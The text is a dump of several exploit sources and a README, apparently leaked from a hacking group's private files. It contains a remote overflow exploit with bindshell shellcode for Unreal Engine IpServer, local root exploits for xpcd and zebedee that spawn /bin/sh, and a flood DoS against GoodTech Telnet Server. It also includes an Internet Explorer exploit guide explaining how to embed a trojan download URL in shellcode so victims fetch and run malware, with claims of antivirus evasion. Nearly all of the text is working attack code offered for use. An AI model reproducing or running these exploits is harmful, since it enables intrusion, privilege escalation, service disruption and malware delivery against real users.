sigaction(SIGBUS,&osigbus,NULL); sigaction(SIGSEGV,&osigsegv,NULL); } int testaddr(unsigned addr) { int val; val = setjmp(jmp); if (val == 0) { asm ("verr (%%eax)" : : "a" (addr)); return MAP_ISPAGE; } return val; } int testaddw(unsigned addr) { int val; val = setjmp(jmp); if (val == 0) { asm ("verw (%%eax)" : : "a" (addr)); return MAP_ISPAGE; } return val; } unsigned int dump_mem (char *a,unsigned int size,char *fname ) { int coun; int was_bus=1; FILE *fh; int i; unsigned int elf_start=0; unsigned int start_addr,end_addr; printf ("DUMP MEM %08x\n",a); prepare (); fh=fopen(fname,"w"); for(coun=0;coun Attach e atachei o UCC que eu rodei ai dei f9 (run), pra ele rodar o UCC.. porque quando vc d? o attach, ele STOPA o programa que vc attachou. ae roda o xploit, vai no olly, d? um alt+m (memory) , ctrl+b (search), e mete 90909090 pra procurar, ae ele vai achar nossos NOPS fiz a funcao shell() pra fazer a conexao depois que o exploit tiver funcionando, ai o cara nao precisa conectar com telnet, etc... altera o shellcode pra connectback se preferir ah, tem um porem, o EIP ficou com nullbyte 0x00xx.. http://www.metasploit.com/opcode_search.html?OS=Windows+XP&SP=SP1&FSELMETH=Common&FILES=ntdll.dll+kernel32.dll&TYPE=Register®=ecx ai eu pensei em por o retaddr no ECX, mas daria na mesma, ele vai quebrar o meu PACKET por causa do 00, e so vai mandar o que veio antes... ai pensei em fazer com tudo com return into libc igual foi feito nos exploits de webdav (IIS5.0).. da um look ae nos exploits, no inicio deles tem um textinho comentado, falando sobre esse esquema do nullbyte no RETADDR http://www.securityfocus.com/archive/1/316256 http://www.rs-labs.com/exploitsntools/rs_iis.c qualquer coisa deixa msg no ICQ... abra?os! VERY PRIV8!!! DO NOT DISTRIBUTE!!! */ #include #include #include #include //#define WIN32 typedef unsigned char u_char; typedef unsigned short u_short; typedef unsigned int u_int; typedef unsigned long u_long; #ifdef WIN32 #define close closesocket #include #include #pragma comment(lib, "ws2_32") #else #include #include #include #include #include #endif #define TIMEOUT 4 #define BUFF_MAXLEN 2048 #define NOPS 100 #define OFFS_ECX 32 #define OFFS_EIP 48 /* dont change it */ #define IPSQUERY "\\secure\\" #define PADDING 12 #define RETADDR 0x12E1FC /* port 4444 bindshell */ unsigned char shellcode[] = "\xeb\x19\x5e\x31\xc9\x81\xe9\x89\xff\xff\xff\x81\x36\x80\xbf\x32" "\x94\x81\xee\xfc\xff\xff\xff\xe2\xf2\xeb\x05\xe8\xe2\xff\xff\xff" "\x03\x53\x06\x1f\x74\x57\x75\x95\x80\xbf\xbb\x92\x7f\x89\x5a\x1a" "\xce\xb1\xde\x7c\xe1\xbe\x32\x94\x09\xf9\x3a\x6b\xb6\xd7\x9f\x4d" "\x85\x71\xda\xc6\x81\xbf\x32\x1d\xc6\xb3\x5a\xf8\xec\xbf\x32\xfc" "\xb3\x8d\x1c\xf0\xe8\xc8\x41\xa6\xdf\xeb\xcd\xc2\x88\x36\x74\x90" "\x7f\x89\x5a\xe6\x7e\x0c\x24\x7c\xad\xbe\x32\x94\x09\xf9\x22\x6b" "\xb6\xd7\x4c\x4c\x62\xcc\xda\x8a\x81\xbf\x32\x1d\xc6\xab\xcd\xe2" "\x84\xd7\xf9\x79\x7c\x84\xda\x9a\x81\xbf\x32\x1d\xc6\xa7\xcd\xe2" "\x84\xd7\xeb\x9d\x75\x12\xda\x6a\x80\xbf\x32\x1d\xc6\xa3\xcd\xe2" "\x84\xd7\x96\x8e\xf0\x78\xda\x7a\x80\xbf\x32\x1d\xc6\x9f\xcd\xe2" "\x84\xd7\x96\x39\xae\x56\xda\x4a\x80\xbf\x32\x1d\xc6\x9b\xcd\xe2" "\x84\xd7\xd7\xdd\x06\xf6\xda\x5a\x80\xbf\x32\x1d\xc6\x97\xcd\xe2" "\x84\xd7\xd5\xed\x46\xc6\xda\x2a\x80\xbf\x32\x1d\xc6\x93\x01\x6b" "\x01\x53\xa2\x95\x80\xbf\x66\xfc\x81\xbe\x32\x94\x7f\xe9\x2a\xc4" "\xd0\xef\x62\xd4\xd0\xff\x62\x6b\xd6\xa3\xb9\x4c\xd7\xe8\x5a\x96" "\x80\xae\x6e\x1f\x4c\xd5\x24\xc5\xd3\x40\x64\xb4\xd7\xec\xcd\xc2" "\xa4\xe8\x63\xc7\x7f\xe9\x1a\x1f\x50\xd7\x57\xec\xe5\xbf\x5a\xf7" "\xed\xdb\x1c\x1d\xe6\x8f\xb1\x78\xd4\x32\x0e\xb0\xb3\x7f\x01\x5d" "\x03\x7e\x27\x3f\x62\x42\xf4\xd0\xa4\xaf\x76\x6a\xc4\x9b\x0f\x1d" "\xd4\x9b\x7a\x1d\xd4\x9b\x7e\x1d\xd4\x9b\x62\x19\xc4\x9b\x22\xc0" "\xd0\xee\x63\xc5\xea\xbe\x63\xc5\x7f\xc9\x02\xc5\x7f\xe9\x22\x1f" "\x4c\xd5\xcd\x6b\xb1\x40\x64\x98\x0b\x77\x65\x6b\xd6\x93\xcd\xc2" "\x94\xea\x64\xf0\x21\x8f\x32\x94\x80\x3a\xf2\xec\x8c\x34\x72\x98" "\x0b\xcf\x2e\x39\x0b\xd7\x3a\x7f\x89\x34\x72\xa0\x0b\x17\x8a\x94" "\x80\xbf\xb9\x51\xde\xe2\xf0\x90\x80\xec\x67\xc2\xd7\x34\x5e\xb0" "\x98\x34\x77\xa8\x0b\xeb\x37\xec\x83\x6a\xb9\xde\x98\x34\x68\xb4" "\x83\x62\xd1\xa6\xc9\x34\x06\x1f\x83\x4a\x01\x6b\x7c\x8c\xf2\x38" "\xba\x7b\x46\x93\x41\x70\x3f\x97\x78\x54\xc0\xaf\xfc\x9b\x26\xe1" "\x61\x34\x68\xb0\x83\x62\x54\x1f\x8c\xf4\xb9\xce\x9c\xbc\xef\x1f" "\x84\x34\x31\x51\x6b\xbd\x01\x54\x0b\x6a\x6d\xca\xdd\xe4\xf0\x90" "\x80\x2f\xa2\x04"; #ifndef WIN32 void std_err(void) { perror("\r\n[-] fatal error\r\n"); exit(1); } #else void std_err(void) { char *error; switch (WSAGetLastError()) { case 10004: error = "interrupted system call"; break; case 10009: error = "bad file number"; break; case 10013: error = "permission denied"; break; case 10014: error = "bad address"; break; case 10022: error = "invalid argument (not bind)"; break; case 10024: error = "too many open files"; break; case 10035: error = "operation would block"; break; case 10036: error = "operation now in progress"; break; case 10037: error = "operation already in progress"; break; case 10038: error = "socket operation on non-socket"; break; case 10039: error = "destination address required"; break; case 10040: error = "message too long"; break; case 10041: error = "protocol wrong type for socket"; break; case 10042: error = "bad protocol option"; break; case 10043: error = "protocol not supported"; break; case 10044: error = "socket type not supported"; break; case 10045: error = "operation not supported on socket"; break; case 10046: error = "protocol family not supported"; break; case 10047: error = "address family not supported by protocol family"; break; case 10048: error = "address already in use"; break; case 10049: error = "can't assign requested address"; break; case 10050: error = "network is down"; break; case 10051: error = "network is unreachable"; break; case 10052: error = "net dropped connection or reset"; break; case 10053: error = "software caused connection abort"; break; case 10054: error = "connection reset by peer"; break; case 10055: error = "no buffer space available"; break; case 10056: error = "socket is already connected"; break; case 10057: error = "socket is not connected"; break; case 10058: error = "can't send after socket shutdown"; break; case 10059: error = "too many references, can't splice"; break; case 10060: error = "connection timed out"; break; case 10061: error = "connection refused"; break; case 10062: error = "too many levels of symbolic links"; break; case 10063: error = "file name too long"; break; case 10064: error = "host is down"; break; case 10065: error = "no route to Host"; break; case 10066: error = "directory not empty"; break; case 10067: error = "too many processes"; break; case 10068: error = "too many users"; break; case 10069: error = "disc quota exceeded"; break; case 10070: error = "stale NFS file handle"; break; case 10091: error = "network subsystem is unavailable"; break; case 10092: error = "winsock dll Version out of range"; break; case 10093: error = "successful WSASTARTUP not yet performed"; break; case 10071: error = "too many levels of remote in path"; break; case 11001: error = "host not found"; break; case 11002: error = "non-authoritative Host not found"; break; case 11003: error = "non-recoverable errors: FORMERR, REFUSED, NOTIMP"; break; case 11004: error = "valid name, no data record of requested type"; break; default: error = strerror(errno); break; } fprintf(stderr, "\r\n [-] error: %s\n", error); exit(1); } void shell(int sock) { int l; char buf[512]; fd_set rfds; while (1) { FD_SET (0, &rfds); FD_SET (sock, &rfds); select (sock + 1, &rfds, NULL, NULL, NULL); if (FD_ISSET (0, &rfds)) { l = read (0, buf, sizeof (buf)); if (l <= 0) { fprintf(stdout, "\r\n [-] connection closed by local user\r\n"); exit(1); } write (sock, buf, l); } if (FD_ISSET (sock, &rfds)) { l = read (sock, buf, sizeof (buf)); if (l == 0) { fprintf(stdout, "\r\n [-] connection closed by local user\r\n"); exit(1); } else if (l < 0) { fprintf(stdout, "\r\n [-] read failure\r\n"); exit(1); } write(1, buf, l); } } } #endif int timeout(u_int sock) { struct timeval tout; fd_set fd_read; int err; tout.tv_sec = TIMEOUT; tout.tv_usec = 0; FD_ZERO(&fd_read); FD_SET(sock, &fd_read); err = select(sock + 1, &fd_read, NULL, NULL, &tout); if (err < 0) std_err(); if (!err) return -1; return 0; } u_long resolv(char *host) { struct hostent *hp; u_long host_ip; host_ip = inet_addr(host); if (host_ip == INADDR_NONE) { hp = gethostbyname(host); if (!hp) { fprintf(stdout, " [-] unable to resolve hostname (%s)\r\n", host); exit(1); } else host_ip = *(u_long *)hp->h_addr; } return host_ip; } void gs_info_udp(u_long ip, u_short port) { struct sockaddr_in peer; int sd, err, psz, nt = 1; u_char buff[2048], *p1, *p2; peer.sin_addr.s_addr = ip; peer.sin_port = htons(port); peer.sin_family = AF_INET; psz = sizeof(peer); sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP); if (sd < 0) std_err(); if (sendto(sd, "\\status\\", 8, 0, (struct sockaddr *)&peer, psz) < 0) std_err(); if (timeout(sd) < 0) { fprintf(stdout, " [-] socket timeout, no replies received. probably the server doesn't support the gamespy query protocol or the port is wrong\r\n\r\n"); close(sd); exit(1); } err = recvfrom(sd, buff, sizeof(buff) - 1, 0, (struct sockaddr *)&peer, &psz); if (err < 0) std_err(); buff[err] = 0x00; p1 = buff; while (1) { p2 = strchr((char *)p1, '\\'); if (!p2) break; *p2 = 0x00; if (!nt) { fprintf(stdout, "%16s: ", p1); nt++; } else { fprintf(stdout, "%s\n", p1); nt = 0; } p1 = p2 + 1; } fprintf(stdout, "%s\n\n", p1); close(sd); } int main(int argc, char **argv) { int sd, len, psz, i; u_long ret, nxhop; u_short port; u_char buff[BUFF_MAXLEN + 1]; u_char jmp[5], packet[1000]; struct sockaddr_in peer; #ifdef WIN32 WSADATA wsaData; WSAStartup(MAKEWORD(2,1), &wsaData); #endif setbuf(stdout, NULL); fprintf(stdout, "\r\n Unreal Engine (IpServer) remote exploit w32/x86\r\n\r\n"); if (argc < 3) { fprintf(stdout, " (usage) %s \r\n", argv[0]); exit(1); } port = atoi(argv[2]); peer.sin_addr.s_addr = resolv(argv[1]); peer.sin_port = htons(port); peer.sin_family = AF_INET; psz = sizeof(peer); fprintf(stdout, " (target) %s\r\n", inet_ntoa(peer.sin_addr)); fprintf(stdout, " (port) %hu\r\n", port); fprintf(stdout, " (informations)\r\n"); gs_info_udp(peer.sin_addr.s_addr, port); // xor ? ret = RETADDR; // RETADDR ^ 0xFFFFFFFF; jmp[0] = (ret & 0x000000ff); jmp[1] = (ret & 0x0000ff00) >> 8; jmp[2] = (ret & 0x00ff0000) >> 16; jmp[3] = (ret & 0xff000000) >> 24; jmp[4] = 0; nxhop = strlen(IPSQUERY); memcpy(packet, IPSQUERY, nxhop); memset(packet+nxhop, 0x41, (OFFS_ECX - nxhop)); nxhop = OFFS_ECX; memset(packet+nxhop, 'X', 4); nxhop += 4; memset(packet+nxhop, 'A', PADDING); memcpy(packet+OFFS_EIP, jmp, 4); nxhop = OFFS_EIP + 4; memset(packet+nxhop, 0x5C, 1); nxhop += 1; memset(packet+nxhop, 0x90, NOPS); nxhop += NOPS; memcpy(packet+nxhop, shellcode, strlen(shellcode)); nxhop += strlen(shellcode); memset(packet+nxhop, 0, 1); // the packet must be // \secure\AAAAAAAAAAAAAAAAAAAAAAAAccccAAAAAAAAAAAArrrr\n..ns..s // AAAA = garbage (yeah, only to alignment) // cccc = ecx // rrrr = retaddr, // n..n = some nops // s..s = shellcode /* if (packet[48] == 0 || packet[49] == 0 || packet[50] == 0 || packet[51] == 0) { fprintf(stderr, " [-] RET value contains null-byte\r\n"); exit(1); } */ fprintf(stdout, " (exploiting) "); if ((sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP)) < 0 ) std_err(); if (sendto(sd, packet, sizeof(packet)-1, 0, (struct sockaddr *)&peer, psz) < 0) std_err(); if (timeout(sd) < 0) { fprintf(stdout, "yeahhh, enjoy it =)\r\n\r\n"); } else { len = recvfrom(sd, buff, BUFF_MAXLEN, 0, (struct sockaddr *)&peer, &psz); if (len < 0) std_err(); buff[len] = 0x00; if (strstr((char *)buff, "validate")) { fprintf(stdout, "server doesn't seem vulnerable\r\n\r\n", stdout); } else { fprintf(stdout, "server doesn't support this query, so it's NOT vulnerable\r\n\r\n"); } } close(sd); return(0); } $ cat unxpcd.c /* xpcd <= 2.09 local r00t exploit by darkeagle 02.02.05 */ #include #include char shellcode[]= // setreuid(0,0); Coded by ChoiX [unl0ck team] "\x31\xc0" // xor %eax,%eax "\x31\xdb" // xor %ebx,%ebx "\x31\xc9" // xor %ecx,%ecx "\xb0\x46" // mov $0x46,%al "\xcd\x80" // int $0x80 // execve /bin/sh "\x31\xc0" // xor %eax,%eax "\x50" // push %eax "\x68\x2f\x2f\x73\x68" // push $0x68732f2f "\x68\x2f\x62\x69\x6e" // push $0x6e69622f "\x89\xe3" // mov %esp,%ebx "\x8d\x54\x24\x08" // lea 0x8(%esp,1),%edx "\x50" // push %eax "\x53" // push %ebx "\x8d\x0c\x24" // lea (%esp,1),%ecx "\xb0\x0b" // mov $0xb,%al "\xcd\x80" // int $0x80 // exit(); "\x31\xc0" // xor %eax,%eax "\xb0\x01" // mov $0x1,%al "\xcd\x80"; // int $0x80 int main(int argc, char *argv[]) { char buf[1024]; long RET = 0x41424344; char *path; printf("\nxpcd local root exploit\nby Dark Eagle [GOTFault]\n\n"); if ( argc < 2 ) { printf("usage: %s \n", argv[0]); exit(0); } path = argv[1]; RET = 0xbffffffa - strlen(shellcode) - strlen(path); memset(buf, 'A', 284); *(long*)&buf[284] = RET; setenv("HOME", buf, 1); setenv("SHELLCODE", shellcode, 1); execl(path, path, NULL); return 0; = $ cat un-D_0WNED.c /* 1337 0day D0S exploit for latest version of GoodTech Telnet Server for Windows NT/2000 bug found by darkeagle 16.03.05 at 11:30 am */ #include #include #include int main(int argc, char **argv) { int i, err; unsigned char mex[300000]; SOCKET sock; struct sockaddr_in sock_addr; WSADATA data; WORD p; p=MAKEWORD(2,0); i = 0; if ( argc < 2 ) { printf("\n\n 1337 0day D0S exploit for GoodTech Telnet Server for Windows NT/2000\n\n"); printf(" usage: %s \n\n", argv[0]); exit(5); } printf("\n\n 1337 0day D0S exploit for GoodTech Telnet Server for Windows NT/2000\n\n"); for ( ;; ) { WSAStartup(p,&data); i++; sock = socket(AF_INET, SOCK_STREAM, 0); sock_addr.sin_family=PF_INET; sock_addr.sin_port=htons(2380); /* Administration web server port */ sock_addr.sin_addr.s_addr= inet_addr(argv[1]); err = connect(sock,(struct sockaddr*)&sock_addr,sizeof(struct sockaddr)); if(err<0){ printf("Server D_OWNED!!!!!!!!!\n", argv[1]); break; exit(-1); } memset(mex, 0x55, 55555); printf("%d - Sending %d bytes.....\n", i, strlen(mex)); send(sock, mex , strlen(mex), 0); closesocket(sock); WSACleanup(); } return 0; } $ cat undee.c /* zebedee <= 2.4.1 local sploit by darkeagle 22.01.05 */ #include #include static char shellcode[]= "\x31\xc0\x31\xdb\xb0\x17\xcd\x80" "\xb0\x2e\xcd\x80\xeb\x15\x5b\x31" "\xc0\x88\x43\x07\x89\x5b\x08\x89" "\x43\x0c\x8d\x4b\x08\x31\xd2\xb0" "\x0b\xcd\x80\xe8\xe6\xff\xff\xff" "/bin/sh"; // setuid(0); and exec(/bin/sh) code int main(int argc, char *argv[]) { long RET; char *path; char buf[14000]; if ( argc < 2 ) { printf("Zebedee local exploit by darkeagle\n\n"); printf("usage: %s \n", argv[0]); exit(0); } path = argv[1]; RET = 0xbffff910; // mandrake 10.0 OR memset(buf, 0x00, sizeof(buf)); memset(buf, 0x43, 2000); sprintf(buf+2000, "%s", shellcode); *(long*)&buf[1052] = RET; execl(path, path, buf, NULL); return 0; } $ cd ie_0day/ $ ls README.txt fuck.pl mafaka.html shellcode.txt $ cat * 0day IE <= 6.0 SP1 Universal Exploit mafaka.html downloads Notepad from site and execute it. y0, dude, i wanna say you details "how to write trojan-downloader shellcode" i have written shellcode for all win32 platforms. see it's in UTF-16 format on Java-Script: "%u0FEB"+"%u8058"+"%u1730"+"%u8140"+"%u6D38"+"%u3030"+"%u7521"+"%uEBF4"+"%uE805"+"%uFFEC"+ "%uFFFF%u94FE%u1716%u4A17%u2642%u73CC%u149C%u8457%u549C%u57E8"+ "%uEE62%u449C%u7114%uC526%uAF71%u0717%u9671%u5A2D%u634D%u3E10"+ "%uFED5%uE8E5%uE8E8%uC49E%u6D9C%u162B%u14C0%u6F48%u5C9C%u9C0F"+ "%u3764%u6C9C%u1633%u16C1%uEBC0%u16BA%u81C7%uEA90%u2646%u97DE"+ "%u18D6%uB1E4%u1D65%u4E81%uEA90%u0563%u5050%uF1F5%u18A9%u1717"+ "%u3E17%u3ED9%uFEE0%uE8FF%uE8E8%uD726%u9C71%uD610%u15F7%u649C"+ "%u160B%u16C1%uBAD1%uC716%uD19E%uC09E%u9A4A%uB792%u1717%u5717"+ "%u2F97%u6216%uD1ED%u1717%u929A%u170B%u1717%u4047%uC1E8%u137F"+ "%u1717%u7F17%u0717%u1717%u687F%u8F81%u7F17%u1717%u1717%uC7E8"+ "%u929E%u179A%u1717%u929A%u1718%u1717%u4047%uC1E8%u9A40%u429A"+ "%u1717%u4617%uC7E8%uD09E%u929A%u174A%u1717%u4047%uC1E8%uDE26"+ "%u4646%u4646%uE846%u9EC7%u9AD4%u7C92%u1717%u4717%uE840%u26C1"+ "%u46DE%u4646%u9A46%uB682%u1717%u4517%uE844%u9EC7%u9AD4%u6B92"+ "%u1717%u4717%uE840%u9AC1%u869A%u1717%u4617%u687F%u8F81%uE817"+ "%u9AA2%u1717%u4417%uC7E8%u9A48%u3E92%u1717%u4717%uE840%u7FC1"+ "%u1717%u1717%u8A9A%u1782%u1717%uE844%u9EC7%u9AD4%u2692%u1717"+ "%u4717%uE840%uE8C1%u86A2%u1717%uE817%u9AA2%u1717%u4417%uC7E8"+ "%u929A%u172E%u1717%u4047%uC1E8%uE844%u9AC7%u5692%u1717%u4717"+ "%uE840%u7FC1%u1712%u1717%u9A9A%u1782%u1717%uE846%u9AC7%u5E92"+ "%u1717%u4717%uE840%u7FC1%u1717%u1717%uC7E8%u6FFF%uE8E9%u50E8"+ "%u6372%u6547%u7478%u7356%u6573%u6472%u1764%u785B%u7376%u7E5B"+ "%u6575%u6576%u566E%u4117%u657E%u6263%u7B76%u7B56%u787B%u1774"+ "%u7B48%u6574%u7672%u1763%u7B48%u6560%u637E%u1772%u7B48%u7B74"+ "%u6478%u1772%u7E40%u5279%u726F%u1774%u6F52%u637E%u6547%u7478"+ "%u6472%u1764%u7E40%u5E79%u7279%u1763%u795E%u7263%u7965%u6372"+ "%u6758%u7972%u1756%u795E%u7263%u7965%u6372%u6758%u7972%u6542"+ "%u567B%u5E17%u6379%u6572%u7279%u4563%u7672%u5173%u7B7E%u1772"+ "%u1717%u1717%u1717%u1717%u277A%u3927%u6F72%u1772%u306D%u2130"+ "%u7468%u7074%u2f3a%u752f%u6c6e%u6330%u2e6b%u726f%u2f67%u6f6e%u6574%u6170%u2e64%u7865%u0165" it's cutted from my download trojan shellcode. it downloads file (notepad.exe) from http://unl0ck.org. look at this: "%u7468%u7074%u2f3a%u752f%u6c6e%u6330%u2e6b%u726f"+ "%u2f67%u6f6e%u6574%u6170%u2e64%u7865%u0165" here is "http://unl0ck.org/notepad.exe"+"%u01" in UTF-16 on contrary shellcode :) i.e. write your site like: http://trojan.com/virus.exe save this data to any file. and open this file with any win32-hex-editor: in C/C++ hex format it looks like this: \x68\x74\x74\x70\x3A\x2F\x2F\x74\x72\x6F\x6A\x61\x6E\x2E\x63\x6F \x6D\x2F\x76\x69\x72\x75\x73\x2E\x65\x78\x65 then you must add here \x01 byte. so result will be \x68\x74\x74\x70\x3A\x2F\x2F\x74\x72\x6F\x6A\x61\x6E\x2E\x63\x6F \x6D\x2F\x76\x69\x72\x75\x73\x2E\x65\x78\x65\x01 next you need replace all "\x" symbols with "%u" in any text-editor. result will be like this: %u68%u74%u74%u70%u3A%u2F%u2F%u74%u72%u6F%u6A%u61%u6E%u2E%u63%u6F %u6D%u2F%u76%u69%u72%u75%u73%u2E%u65%u78%u65%u01 next you need save this data to file (only UTF-16 shellcode!!!). then look at "fuck.pl" Perl script and correct some lines. 1st of all you need to correct file open line. open(FILE,"perl fuck.pl >result.txt then open result.txt and you will see content like this: %u74%u68%u70%u74%u2F%u3A%u74%u2F%u6F%u72%u61%u6A%u2E%u6E%u6F %u63%u2F%u6D%u69%u76%u75%u72%u2E%u73%u78%u65%u01%u65 then convert it like in my code like: %u7468%u7074%u2F3A%u742F%u6F72%u616A%u2E6E%u6F63%u2F6D%u6976%u7572%u2E73%u7865%u0165 and now put instead "%u7468%u7074%u2f3a%u752f%u6c6e%u6330%u2e6b%u726f"+ "%u2f67%u6f6e%u6574%u6170%u2e64%u7865%u0165" ur code: "%u7468%u7074%u2F3A%u742F%u6F72%u616A%u2E6E%u6F63%u2F6D%u6976%u7572%u2E73%u7865%u0165" then save html and try to open file :) so, end result of full shellcode will be: "%u0FEB"+"%u8058"+"%u1730"+"%u8140"+"%u6D38"+"%u3030"+"%u7521"+"%uEBF4"+"%uE805"+"%uFFEC"+ "%uFFFF%u94FE%u1716%u4A17%u2642%u73CC%u149C%u8457%u549C%u57E8"+ "%uEE62%u449C%u7114%uC526%uAF71%u0717%u9671%u5A2D%u634D%u3E10"+ "%uFED5%uE8E5%uE8E8%uC49E%u6D9C%u162B%u14C0%u6F48%u5C9C%u9C0F"+ "%u3764%u6C9C%u1633%u16C1%uEBC0%u16BA%u81C7%uEA90%u2646%u97DE"+ "%u18D6%uB1E4%u1D65%u4E81%uEA90%u0563%u5050%uF1F5%u18A9%u1717"+ "%u3E17%u3ED9%uFEE0%uE8FF%uE8E8%uD726%u9C71%uD610%u15F7%u649C"+ "%u160B%u16C1%uBAD1%uC716%uD19E%uC09E%u9A4A%uB792%u1717%u5717"+ "%u2F97%u6216%uD1ED%u1717%u929A%u170B%u1717%u4047%uC1E8%u137F"+ "%u1717%u7F17%u0717%u1717%u687F%u8F81%u7F17%u1717%u1717%uC7E8"+ "%u929E%u179A%u1717%u929A%u1718%u1717%u4047%uC1E8%u9A40%u429A"+ "%u1717%u4617%uC7E8%uD09E%u929A%u174A%u1717%u4047%uC1E8%uDE26"+ "%u4646%u4646%uE846%u9EC7%u9AD4%u7C92%u1717%u4717%uE840%u26C1"+ "%u46DE%u4646%u9A46%uB682%u1717%u4517%uE844%u9EC7%u9AD4%u6B92"+ "%u1717%u4717%uE840%u9AC1%u869A%u1717%u4617%u687F%u8F81%uE817"+ "%u9AA2%u1717%u4417%uC7E8%u9A48%u3E92%u1717%u4717%uE840%u7FC1"+ "%u1717%u1717%u8A9A%u1782%u1717%uE844%u9EC7%u9AD4%u2692%u1717"+ "%u4717%uE840%uE8C1%u86A2%u1717%uE817%u9AA2%u1717%u4417%uC7E8"+ "%u929A%u172E%u1717%u4047%uC1E8%uE844%u9AC7%u5692%u1717%u4717"+ "%uE840%u7FC1%u1712%u1717%u9A9A%u1782%u1717%uE846%u9AC7%u5E92"+ "%u1717%u4717%uE840%u7FC1%u1717%u1717%uC7E8%u6FFF%uE8E9%u50E8"+ "%u6372%u6547%u7478%u7356%u6573%u6472%u1764%u785B%u7376%u7E5B"+ "%u6575%u6576%u566E%u4117%u657E%u6263%u7B76%u7B56%u787B%u1774"+ "%u7B48%u6574%u7672%u1763%u7B48%u6560%u637E%u1772%u7B48%u7B74"+ "%u6478%u1772%u7E40%u5279%u726F%u1774%u6F52%u637E%u6547%u7478"+ "%u6472%u1764%u7E40%u5E79%u7279%u1763%u795E%u7263%u7965%u6372"+ "%u6758%u7972%u1756%u795E%u7263%u7965%u6372%u6758%u7972%u6542"+ "%u567B%u5E17%u6379%u6572%u7279%u4563%u7672%u5173%u7B7E%u1772"+ "%u1717%u1717%u1717%u1717%u277A%u3927%u6F72%u1772%u306D%u2130"+ //"%u7468%u7074%u2F3A%u752F%u6C6E%u6330%u2E6B%u726F%u2F67%u6F6E%u6574%u6170%u2E64%u7865%u0165" // http://unl0ck.org/notepad.exe "%u7468%u7074%u2F3A%u742F%u6F72%u616A%u2E6E%u6F63%u2F6D%u6976%u7572%u2E73%u7865%u0165" // http://trojan.com/virus.exe NOTE: "//" it's comments. g00d luck! Successfully tested on WinXP SP0 rus/eng, WinXP SP1 rus/eng, WinXP SP2 rus/eng, Win9x. Successfully percent to execute code is: 90% Undetecting tested on: AntiVirus Kaspersy, Norton AV, Dr. Web. p.s. darkeagle http://unl0ck.org #!/usr/bin/perl open(FILE,"; close(FILE); foreach $line(@passwd) { ($r0,$r1,$r2,$r3,$r4,$r5,$r6,$r7,$r8,$r9,$r10,$r11,$r12,$r13,$r14,$r15) = split("%",$line); print "%$r1%$r0%$r3%$r2%$r5%$r4%$r7%$r6%$r9%$r8%$r11%$r10%$r13%$r12%$r15%$r14\n"; } C/C++ shellcode: \xEB\x0F\x58\x80\x30\x17\x40\x81\x38\x6D\x30\x30\x21\x75\xF4 \xEB\x05\xE8\xEC\xFF\xFF\xFF\xFE\x94\x16\x17\x17\x4A\x42\x26 \xCC\x73\x9C\x14\x57\x84\x9C\x54\xE8\x57\x62\xEE\x9C\x44\x14 \x71\x26\xC5\x71\xAF\x17\x07\x71\x96\x2D\x5A\x4D\x63\x10\x3E \xD5\xFE\xE5\xE8\xE8\xE8\x9E\xC4\x9C\x6D\x2B\x16\xC0\x14\x48 \x6F\x9C\x5C\x0F\x9C\x64\x37\x9C\x6C\x33\x16\xC1\x16\xC0\xEB \xBA\x16\xC7\x81\x90\xEA\x46\x26\xDE\x97\xD6\x18\xE4\xB1\x65 \x1D\x81\x4E\x90\xEA\x63\x05\x50\x50\xF5\xF1\xA9\x18\x17\x17 \x17\x3E\xD9\x3E\xE0\xFE\xFF\xE8\xE8\xE8\x26\xD7\x71\x9C\x10 \xD6\xF7\x15\x9C\x64\x0B\x16\xC1\x16\xD1\xBA\x16\xC7\x9E\xD1 \x9E\xC0\x4A\x9A\x92\xB7\x17\x17\x17\x57\x97\x2F\x16\x62\xED \xD1\x17\x17\x9A\x92\x0B\x17\x17\x17\x47\x40\xE8\xC1\x7F\x13 \x17\x17\x17\x7F\x17\x07\x17\x17\x7F\x68\x81\x8F\x17\x7F\x17 \x17\x17\x17\xE8\xC7\x9E\x92\x9A\x17\x17\x17\x9A\x92\x18\x17 \x17\x17\x47\x40\xE8\xC1\x40\x9A\x9A\x42\x17\x17\x17\x46\xE8 \xC7\x9E\xD0\x9A\x92\x4A\x17\x17\x17\x47\x40\xE8\xC1\x26\xDE \x46\x46\x46\x46\x46\xE8\xC7\x9E\xD4\x9A\x92\x7C\x17\x17\x17 \x47\x40\xE8\xC1\x26\xDE\x46\x46\x46\x46\x9A\x82\xB6\x17\x17 \x17\x45\x44\xE8\xC7\x9E\xD4\x9A\x92\x6B\x17\x17\x17\x47\x40 \xE8\xC1\x9A\x9A\x86\x17\x17\x17\x46\x7F\x68\x81\x8F\x17\xE8 \xA2\x9A\x17\x17\x17\x44\xE8\xC7\x48\x9A\x92\x3E\x17\x17\x17 \x47\x40\xE8\xC1\x7F\x17\x17\x17\x17\x9A\x8A\x82\x17\x17\x17 \x44\xE8\xC7\x9E\xD4\x9A\x92\x26\x17\x17\x17\x47\x40\xE8\xC1 \xE8\xA2\x86\x17\x17\x17\xE8\xA2\x9A\x17\x17\x17\x44\xE8\xC7 \x9A\x92\x2E\x17\x17\x17\x47\x40\xE8\xC1\x44\xE8\xC7\x9A\x92 \x56\x17\x17\x17\x47\x40\xE8\xC1\x7F\x12\x17\x17\x17\x9A\x9A \x82\x17\x17\x17\x46\xE8\xC7\x9A\x92\x5E\x17\x17\x17\x47\x40 \xE8\xC1\x7F\x17\x17\x17\x17\xE8\xC7\xFF\x6F\xE9\xE8\xE8\x50 \x72\x63\x47\x65\x78\x74\x56\x73\x73\x65\x72\x64\x64\x17\x5B \x78\x76\x73\x5B\x7E\x75\x65\x76\x65\x6E\x56\x17\x41\x7E\x65 \x63\x62\x76\x7B\x56\x7B\x7B\x78\x74\x17\x48\x7B\x74\x65\x72 \x76\x63\x17\x48\x7B\x60\x65\x7E\x63\x72\x17\x48\x7B\x74\x7B \x78\x64\x72\x17\x40\x7E\x79\x52\x6F\x72\x74\x17\x52\x6F\x7E \x63\x47\x65\x78\x74\x72\x64\x64\x17\x40\x7E\x79\x5E\x79\x72 \x63\x17\x5E\x79\x63\x72\x65\x79\x72\x63\x58\x67\x72\x79\x56 \x17\x5E\x79\x63\x72\x65\x79\x72\x63\x58\x67\x72\x79\x42\x65 \x7B\x56\x17\x5E\x79\x63\x72\x65\x79\x72\x63\x45\x72\x76\x73 \x51\x7E\x7B\x72\x17\x17\x17\x17\x17\x17\x17\x17\x17\x7A\x27 \x27\x39\x72\x6F\x72\x17\x6D\x30\x30\x21 //---------- http://site.com/trojanX.exe 